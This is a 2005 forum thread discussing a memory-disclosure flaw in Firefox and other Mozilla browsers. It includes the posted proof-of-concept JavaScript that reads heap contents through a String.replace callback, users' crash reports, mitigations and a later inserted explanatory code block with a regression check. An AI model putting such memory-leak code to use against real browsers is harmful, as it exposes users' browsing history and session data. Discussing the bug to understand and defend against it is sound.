
Critical flaw in Mozilla-based browsers

Posted: 2005-04-06 02:46am
by Faram
Proof of concept

Bad mozilla BAD

Mozilla
Firefox
Netscape

Is at risk.

Posted: 2005-04-06 04:40am
by Archaic`
:shock:

They dropped the ball bad with this one. Hopefully there'll be an urgent security update soon.

Posted: 2005-04-06 06:18am
by Terr Fangbite
Windows crashed Mozilla when I tried running the script. Repeatedly. Funny that.

Posted: 2005-04-06 11:01am
by Praxis
Weird. It worked, showing some sites I had just been to. I clicked a couple more times and suddenly Firefox crashed.

Posted: 2005-04-06 12:16pm
by Guy N. Cognito
Hmmmm.... this isn't good. Luckily I disable external access to my computer when it isn't in use. Still disconcerting though.

Posted: 2005-04-06 12:21pm
by Master of Ossus
All you have to do is disable JAVA scripting, which is pretty easy with Mozilla (I had actually already done it).

Posted: 2005-04-06 12:21pm
by GrandMasterTerwynn
Praxis wrote: Weird. It worked, showing some sites I had just been to. I clicked a couple more times and suddenly Firefox crashed.
Yep. That's what happens when you try to access memory that doesn't belong to you. Seg. fault/core dump.

This is an appallingly bad security bug.

Posted: 2005-04-06 12:58pm
by Dalton
Crashed my browser too :(

Posted: 2005-04-06 01:57pm
by Dooey Jo
Here's the code that does it (except those three Xs should actually be 10 000):

function genGluck(str){
	var x = str;
	var rx=/end/i;
	x = x.replace(rx,function($1){
		$1.match(rx);
		return "";
	});
	x = x.replace(/^end/,"");
	return x;
}


function readMemory()
{
	var mem = genGluck("XXXend");

	mem = mem.replace(/[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g, " ");

	document.getElementById('result').value = mem;

}

Now, how the hell does that work? That first regexp up there should replace "end" with nothing, right? And the second regexp replaces all "end" with something before with nothing, so all that basically does is removes that last "end". And that last, mem.replace, should replace most readable characters with a blank space, so why does it write characters from the memory? :wtf:

This seems to be almost as weird as the time when IE started hating my if-s (which was very weird, but then again, it was IE...)

Posted: 2005-04-06 03:14pm
by Spacebeard
Dooey Jo wrote: Now, how the hell does that work? That first regexp up there should replace "end" with nothing, right? And the second regexp replaces all "end" with something before with nothing, so all that basically does is removes that last "end". And that last, mem.replace, should replace most readable characters with a blank space, so why does it write characters from the memory?
The last regexp is doing the reverse of what you say: it's keeping only the human-readable characters, and replacing unprintable characters with a space. Note the '^' at the front of the set; it's matching characters in the complement of that set.

The bug is exploited in the 'genGluck' function. I'm not familiar with Javascript, but it looks as though by using a lambda function as the argument to 'replace' as they do, they are able to read off the end of their allocated string and into the heap. Probably the memory accessible to them depends on where in the heap their string got allocated.

Until there is a fix available, I would turn off Javascript as much as possible, turning it on only for sites that demand the use of it. I would also quit the browser and relaunch after viewing or entering sensitive information.
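Spacebeard's reading of the two regexps, tried out in code. This is an added example, not code from the thread: FAKE_HEAP is a constructed stand-in for leaked memory contents, and replaceWithCallbackIsSound is a regression check that a patched engine hands back only the input minus its trailing "end".

```javascript
// Added example (not from the thread): what the filter regexp in the
// posted snippet actually does, run over a hand-built stand-in for memory.

// Constructed sample: readable fragments separated by unprintable bytes,
// roughly what leaked heap contents would look like.
const FAKE_HEAP =
  "\x00\x01\x7fhttp://example.com/login\x00\x00\xfe\xffsession=abc123;\x03\x04\x05" +
  "\x00\x00user@example.com\x00";

// The filter from the posted code. The leading '^' makes the class match
// every character NOT in the listed set, so each run of unprintable bytes
// collapses to one space and the readable text survives.
const UNPRINTABLE_RUN = /[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g;

function keepPrintable(mem) {
  return mem.replace(UNPRINTABLE_RUN, " ");
}

// The misreading discussed in the thread (same set, no '^'): this would
// blank out the readable characters and keep the junk instead.
const PRINTABLE_RUN = /[\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g;

function stripPrintable(mem) {
  return mem.replace(PRINTABLE_RUN, " ");
}

// Split a filtered dump into the readable pieces a viewer would see.
function readableFragments(mem) {
  return keepPrintable(mem).split(" ").filter((s) => s.length > 0);
}

// Regression check for the bug itself, using the same replace-with-callback
// shape as the snippet: a fixed engine returns exactly n X's and nothing
// else; the affected builds returned bytes from beyond the string.
function replaceWithCallbackIsSound(n) {
  const rx = /end/i;
  const input = "X".repeat(n) + "end";
  const out = input.replace(rx, function (m) { m.match(rx); return ""; });
  return out.length === n && /^X*$/.test(out);
}
```

readableFragments(FAKE_HEAP) yields the three embedded strings, which is why the proof of concept showed recently visited sites as readable text with junk turned into spaces.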

Posted: 2005-04-07 09:22am
by Dooey Jo
Javascript can be very useful, too. Most websites would be a lot less functional without it (for most people anyway). It sucks though that there are people out there that use it to do bad stuff, but I guess that's just the way humans are. Someone comes up with a great idea and someone else has to use it to annoy the shit out of others...
Spacebeard wrote: The last regexp is doing the reverse of what you say: it's keeping only the human-readable characters, and replacing unprintable characters with a space. Note the '^' at the front of the set; it's matching characters in the complement of that set.
Ah yes, right you are! *cleans glasses* :oops:
The bug is exploited in the 'genGluck' function. I'm not familiar with Javascript, but it looks as though by using a lambda function as the argument to 'replace' as they do, they are able to read off the end of their allocated string and into the heap. Probably the memory accessible to them depends on where in the heap their string got allocated.
Yes, that is what I find strange. That function should just replace the match with nothing, it should not make memory accessible. Well, I guess that's why it's a bug...

Posted: 2005-04-08 12:42am
by Natorgator
That's odd. I have Firefox and clicked that test repeatedly but no crash. :?

I guess that's a good thing, though :D

Posted: 2005-04-08 06:57am
by Avalon616
I'm sure some of you already know this, but Mozilla is already working on the patch (ver. 1.0.3) which should be out in a couple days...

See here.

Posted: 2005-04-08 11:31am
by The Dark
*shrug* I don't have Java installed for my Firefox anyway (at least, I don't think I do). I still use IE for Java work because the webpages I work on recognize my copy of it. I wonder if ZoneAlarm blocks that security hole...

Posted: 2005-04-08 11:44am
by Uraniun235
The Dark wrote: *shrug* I don't have Java installed for my Firefox anyway (at least, I don't think I do). I still use IE for Java work because the webpages I work on recognize my copy of it. I wonder if ZoneAlarm blocks that security hole...
Java is not the same as JavaScript.

Posted: 2005-04-08 11:54am
by The Dark
Uraniun235 wrote:
The Dark wrote: *shrug* I don't have Java installed for my Firefox anyway (at least, I don't think I do). I still use IE for Java work because the webpages I work on recognize my copy of it. I wonder if ZoneAlarm blocks that security hole...
Java is not the same as JavaScript.
Doh! :banghead: I can't read today. That's what comes of reading through multiple things at work; none of them get read completely correctly.

Posted: 2005-04-08 07:31pm
by phongn
Dooey Jo wrote: Javascript can be very useful, too. Most websites would be a lot less functional without it (for most people anyway). It sucks though that there are people out there that use it to do bad stuff, but I guess that's just the way humans are. Someone comes up with a great idea and someone else has to use it to annoy the shit out of others...
For example, both Google Maps and Gmail heavily use JavaScript. The technology is generically known as Ajax, or "Asynchronous JavaScript + XML."